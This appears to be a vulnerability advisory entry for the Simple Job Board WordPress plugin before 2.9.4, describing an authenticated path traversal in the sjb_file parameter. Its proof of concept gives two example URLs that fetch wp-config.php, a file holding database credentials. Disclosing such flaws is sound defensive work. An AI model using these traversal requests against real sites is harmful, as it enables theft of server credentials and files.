WordPress Plugin Vulnerabilities

Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download

Description

The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack

Proof of Concept

The sjb_file parameter to use may depends on the configuration of the plugin, e.g:

https://example.com/wp-admin/post.php?post=372&action=edit&sjb_file=var/www/wp-config.php
https://example.com/wp-admin/post.php?post=372&action=edit&sjb_file=../../../../wp-config.php

Affects Plugins

Fixed in 2.9.4

References

Classification

Type
TRAVERSAL
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Arcangelo Saracino
Verified
Yes

Timeline

Publicly Published
2021-01-15 (about 3 years ago)
Added
2021-01-15 (about 3 years ago)
Last Updated
2021-01-23 (about 3 years ago)

Other